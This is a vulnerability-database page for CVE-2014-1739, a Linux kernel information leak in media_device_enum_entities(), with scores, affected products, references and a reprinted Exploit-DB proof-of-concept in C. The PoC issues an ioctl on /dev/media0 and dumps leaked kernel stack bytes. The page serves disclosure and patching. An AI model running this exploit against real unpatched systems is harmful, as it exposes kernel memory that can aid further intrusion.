CVE-2014-1739 : Detail

CVE-2014-1739

A01-Broken Access Control
0.04%V3
Local
2014-06-23 08:00 +00:00
2017-12-20 18:57 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

The media_device_enum_entities function in drivers/media/media-device.c in the Linux kernel before 3.14.6 does not initialize a certain data structure, which allows local users to obtain sensitive information from kernel memory by leveraging /dev/media0 read access for a MEDIA_IOC_ENUM_ENTITIES ioctl call.

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Metrics

Metric Score Severity CVSS Vector Source
V2 2.1 AV:L/AC:L/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 39214

Publication date : 2014-05-27 22:00 +00:00
Author : Salva Peiro
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/68048/info The Linux kernel is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to cause a memory leak to obtain sensitive information that may lead to further attacks. Linux kernel 2.6.38 through 3.15-rc2 are vulnerable. */ /* * $File: media-enum-poc.c * $Description: CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking 200 kstack bytes on x86_32. * $Author: Salva Peiró (c) Copyright 2014. * $URL: http://speirofr.appspot.com/files/media-enum-poc.c * $License: GPLv2. */ #include #include #include #include #include #include #define MEDIA_DEV "/dev/media0" int main(int argc, char *argv[]) { struct media_entity_desc u_ent = {}; char *file = MEDIA_DEV; int i, fd, ret; if (argc > 1) file = argv[1]; fd = open(file, O_RDONLY); if (fd < 0){ perror("open " MEDIA_DEV); return -1; } u_ent.id = 0 | MEDIA_ENT_ID_FLAG_NEXT; ret=ioctl(fd, MEDIA_IOC_ENUM_ENTITIES, &u_ent); if (ret < 0){ perror("ioctl " MEDIA_DEV); return -1; } printf("[*] CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking %d kstack bytes:", sizeof(u_ent.reserved) + sizeof(u_ent.raw)); for (i = 0; i < 200/sizeof(uint32_t); i++) { uint32_t data = *(uint32_t*)((uint32_t*)&u_ent.reserved+i); if (i % 4 == 0) printf("\n %08d: ", i); printf("0x%08x ", data); } printf("\n"); return ret; } /* gcc -Wall -g -m32 media-enum-poc.c -o media-enum-poc # */

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version To (excluding) 3.14.6

Configuraton 0

Canonical>>Ubuntu_linux >> Version 12.04

Canonical>>Ubuntu_linux >> Version 13.10

Configuraton 0

Suse>>Linux_enterprise_high_availability_extension >> Version 11

Suse>>Suse_linux_enterprise_desktop >> Version 11

Suse>>Suse_linux_enterprise_server >> Version 11

Suse>>Suse_linux_enterprise_server >> Version 11

References

http://www.ubuntu.com/usn/USN-2263-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.openwall.com/lists/oss-security/2014/06/15/1
Tags : mailing-list, x_refsource_MLIST
http://www.ubuntu.com/usn/USN-2261-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.ubuntu.com/usn/USN-2264-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.securityfocus.com/bid/68048
Tags : vdb-entry, x_refsource_BID
http://www.ubuntu.com/usn/USN-2259-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/59597
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id/1038201
Tags : vdb-entry, x_refsource_SECTRACK
Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.